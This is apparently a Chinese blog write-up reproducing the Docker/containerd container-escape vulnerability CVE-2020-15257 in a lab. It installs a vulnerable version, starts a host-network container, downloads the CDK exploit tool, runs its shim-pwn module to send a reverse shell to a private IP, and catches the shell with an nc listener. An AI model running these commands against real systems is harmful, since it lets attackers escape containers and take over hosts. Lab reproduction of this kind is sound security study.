#|Docker 容器逃逸漏洞(CVE-2020-15257)复现
文章目录
- 环境准备(安装docker)
- 漏洞复现
环境准备(安装docker) 这里我使用的新安装的ubuntu安装一个docker复现漏洞,然后用同网段的kali接收shell
首先给ubuntu换源(换过了就不用换了)
vim /etc/apt/sources.list#添加源
#中科大源
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
#阿里云源
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib#然后执行
sudo apt-get update#报错如下
Err:1 http://mirrors.ustc.edu.cn/kali kali-rolling InRelease
The following signatures couldn't be verified because the public key is not available: NO_PUBKEY ED444FF07D8D0BF6# 把这个公钥添加到服务器就行了
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys ED444FF07D8D0BF6#然后执行
sudo apt-get update
安装有漏洞的docker版本
sudo apt-get install ca-certificates curl software-properties-common
# 添加官方GPG密钥,这一步可能需要root用户执行,ubuntu执行,sudo passwd root 然后su root即可
sudo curl -fsSL https://download.docker.com/linux/ubuntu/gpg | apt-key add -
# 设置稳定的存储库
sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu xenial stable"
# 安装指定版本的docker
sudo apt-get install docker-ce=5:19.03.6~3-0~ubuntu-xenial docker-ce-cli=5:19.03.6~3-0~ubuntu-xenial containerd.io=1.2.4-1
此时查看containerd版本
docker version漏洞影响版本
containerd < 1.4.3
containerd < 1.3.9
文章图片
漏洞复现 下载一个容器,docker换源
docker pull ubuntu:18.04
通过
--net=host
作为启动参数来运行并进入一个容器:sudo docker run -itd --net=host ubuntu:18.04 /bin/bash
【#|Docker 容器逃逸漏洞(CVE-2020-15257)复现】进入容器
sudo docker exec -it <容器id> /bin/bash
接着在容器内执行
cat /proc/net/unix|grep -a "containerd-shim"
可看到抽象命名空间Unix域套接字
文章图片
Poc地址,https://github.com/Xyntax/CDK/releases/tag/0.1.6
下载exp并实现反弹shell,实现docker逃逸
wget https://github.com/Xyntax/CDK/releases/download/0.1.6/cdk_v0.1.6_release.tar.gz
tar -zxvf cdk_v0.1.6_release.tar.gz
./cdk_linux_amd64 run shim-pwn 192.168.170.139 6666
文章图片
kali开启监听
nc -lvnp 6666
成功实现逃逸获取主机shell
文章图片
推荐阅读
- Docker应用:容器间通信与Mariadb数据库主从复制
- LeetCode算法题-11.|LeetCode算法题-11. 盛最多水的容器(Swift)
- docker镜像探索----dive工具
- Nvidia|lxd容器安装cuda11
- Spring注解05|Spring注解05 @Import 给容器快速导入一个组件
- 02|02|简单使用Docker命令
- 图片容器
- Docker-Dockerfile
- Docker|Docker exec 出现 "fork/exec /proc/self/exe: no such file or directory" 问题
- 菜鸟的docker技术入门之路